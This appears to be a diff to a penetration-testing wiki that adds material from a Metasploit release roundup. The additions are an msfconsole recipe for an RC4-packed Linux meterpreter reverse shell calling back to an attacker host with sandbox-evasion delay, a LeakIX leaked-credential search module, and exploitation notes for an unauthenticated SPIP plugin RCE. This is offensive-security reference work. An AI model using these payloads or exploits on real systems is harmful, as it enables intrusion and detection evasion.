Metasploit Wrap-Up 03/13/2026

src/SUMMARY.md

@@ -518,6 +518,7 @@
   - [Roundcube](network-services-pentesting/pentesting-web/roundcube.md)
   - [Spring Actuators](network-services-pentesting/pentesting-web/spring-actuators.md)
   - [Symfony](network-services-pentesting/pentesting-web/symphony.md)
+  - [SPIP](network-services-pentesting/pentesting-web/spip.md)
   - [Tomcat](network-services-pentesting/pentesting-web/tomcat/README.md)
   - [Telerik Ui Aspnet Ajax Unsafe Reflection Webresource Axd](network-services-pentesting/pentesting-web/telerik-ui-aspnet-ajax-unsafe-reflection-webresource-axd.md)
   - [Uncovering CloudFlare](network-services-pentesting/pentesting-web/uncovering-cloudflare.md)

src/generic-hacking/reverse-shells/msfvenom.md

@@ -2,6 +2,12 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
+## References
+
+- [Metasploit Wrap-Up 03/13/2026](https://www.rapid7.com/blog/post/pt-metasploit-wrap-up-03-13-2026)
+
+
+
 ---
 
 ## Basic msfvenom
@@ -27,6 +33,21 @@ EXITFUNC=thread
 PrependSetuid=True #Use this to create a shellcode that will execute something with SUID
 ```
 
+## Metasploit Evasion (Linux RC4 Packer)
+
+This evasion module wraps a Linux x64 payload in a small loader that decrypts it with RC4 at runtime. It can also add a `nanosleep` delay before execution to reduce short-lived sandbox detonation.
+
+```bash
+msfconsole -q
+use evasion/linux/x64/rc4_packer
+show options
+set PAYLOAD linux/x64/meterpreter_reverse_tcp
+set LHOST <attacker_ip>
+set LPORT <attacker_port>
+# Configure the RC4 key / optional delay / output file as shown in options
+run
+```
+
 ## **Windows**
 
 ### **Reverse Shell**
@@ -169,7 +190,10 @@ msfvenom -p cmd/unix/reverse_python LHOST=(IP Address) LPORT=(Your Port) -f raw
 msfvenom -p cmd/unix/reverse_bash LHOST=<Local IP Address> LPORT=<Local Port> -f raw > shell.sh
 ```
 
-{{#include ../../banners/hacktricks-training.md}}
+## References
+
+- [Metasploit Wrap-Up 03/13/2026](https://www.rapid7.com/blog/post/pt-metasploit-wrap-up-03-13-2026)
 
+{{#include ../../banners/hacktricks-training.md}}
 
 

src/generic-methodologies-and-resources/external-recon-methodology/README.md

@@ -65,6 +65,18 @@ You can find the IP and ASN of a domain using [http://ipv4info.com/](http://ipv4
 
 At this point we know **all the assets inside the scope**, so if you are allowed you could launch some **vulnerability scanner** (Nessus, OpenVAS, [**Nuclei**](https://github.com/projectdiscovery/nuclei)) over all the hosts.\
 Also, you could launch some [**port scans**](../pentesting-network/index.html#discovering-hosts-from-the-outside) **or use services like** Shodan, Censys, or ZoomEye **to find** open ports **and depending on what you find you should** take a look in this book to how to pentest several possible services running.\
+**LeakIX** is another useful internet-wide search engine focused on **exposed services** and **leaked credentials/databases**. It can help you quickly map an organization's external exposure and spot leaked datasets to validate and prioritize targets.
+
+Metasploit includes a helper module to query the LeakIX API:
+
+```bash
+msfconsole -q
+use auxiliary/gather/leakix_search
+show options
+# Set the required API key + query options shown above
+run
+```
+
 **Also, It could be worth it to mention that you can also prepare some** default username **and** passwords **lists and try to** bruteforce services with [https://github.com/x90skysn3k/brutespray](https://github.com/x90skysn3k/brutespray).
 
 ## Domains
@@ -746,5 +758,6 @@ There are several tools out there that will perform part of the proposed actions
 
 - All free courses of [**@Jhaddix**](https://twitter.com/Jhaddix) like [**The Bug Hunter's Methodology v4.0 - Recon Edition**](https://www.youtube.com/watch?v=p4JgIu1mceI)
 - [0xdf – HTB: Guardian](https://0xdf.gitlab.io/2026/02/28/htb-guardian.html)
+- [Metasploit Wrap-Up 03/13/2026](https://www.rapid7.com/blog/post/pt-metasploit-wrap-up-03-13-2026)
 
 {{#include ../../banners/hacktricks-training.md}}

src/network-services-pentesting/pentesting-web/README.md

@@ -2,6 +2,12 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
+## References
+
+- [Metasploit Wrap-Up 03/13/2026](https://www.rapid7.com/blog/post/pt-metasploit-wrap-up-03-13-2026)
+
+
+
 ## Basic Info
 
 The web service is the most **common and extensive service** and a lot of **different types of vulnerabilities** exists.
@@ -101,6 +107,7 @@ Some **tricks** for **finding vulnerabilities** in different well known **techno
 - [**Roundcube**](roundcube.md)
 - [**Spring Actuators**](spring-actuators.md)
 - [**Symphony**](symphony.md)
+- [**SPIP**](spip.md)
 - [**Tomcat**](tomcat/index.html)
 - [**VMWare**](vmware-esx-vcenter....md)
 - [**Web API Pentesting**](web-api-pentesting.md)
@@ -437,4 +444,8 @@ Entry_12:
 
 </details>
 
+## References
+
+- [Metasploit Wrap-Up 03/13/2026](https://www.rapid7.com/blog/post/pt-metasploit-wrap-up-03-13-2026)
+
 {{#include ../../banners/hacktricks-training.md}}

src/network-services-pentesting/pentesting-web/spip.md

@@ -0,0 +1,19 @@
+# SPIP
+
+{{#include ../../banners/hacktricks-training.md}}
+
+## Saisies Plugin Unauthenticated PHP Code Injection (RCE)
+
+The SPIP **Saisies** plugin had a pre-auth **PHP code injection** issue (tracked as **CVE-2025-71243**) where attacker-controlled input in the `_anciennes_valeurs` parameter could be evaluated as PHP. If reachable over HTTP(S), a remote unauthenticated request can inject a PHP payload and achieve **RCE** in the web/PHP process context.
+
+### Exploitation Notes
+
+- Identify a SPIP instance exposing the **Saisies** plugin.
+- Send an unauthenticated request supplying a crafted `_anciennes_valeurs` value that becomes executable PHP.
+- Metasploit automation: `exploit/multi/http/spip_saisies_rce`.
+
+## References
+
+- [Metasploit Wrap-Up 03/13/2026](https://www.rapid7.com/blog/post/pt-metasploit-wrap-up-03-13-2026)
+
+{{#include ../../banners/hacktricks-training.md}}